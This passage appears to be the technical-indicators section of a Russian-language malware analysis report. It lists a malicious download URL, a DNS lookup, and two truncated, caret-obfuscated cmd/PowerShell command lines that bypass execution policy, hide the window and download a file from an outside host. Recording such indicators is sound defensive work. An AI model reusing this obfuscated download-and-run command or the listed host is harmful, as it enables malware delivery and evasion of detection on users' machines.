Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oWerSHe^Ll.exe -E^XEC^uTi^O^Np^o^li^cY^ B^yP^As^s ^-nopR^OFiLE ^-^WIN^dOwST^Yl^E^ ^HI^d^d^e^N ^(N^EW-^ObjEc^t Sy^Stem^.nE^t.^w^E^b^c^LI^eNt^).DO^W^n^lOa^Df^iLe('http://m...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /C "p^oWerSHe^Ll.exe -E^XEC^uTi^O^Np^o^li^cY^ B^yP^As^s ^-nopR^OFiLE ^-^WIN^dOwST^Yl^E^ ^HI^d^d^e^N ^(N^EW-^ObjEc^t Sy^Stem^.nE^t.^w^E^b^c^LI^eNt^).DO^W^n^lOa^Df^iLe('http://m...' (со скрытым окном)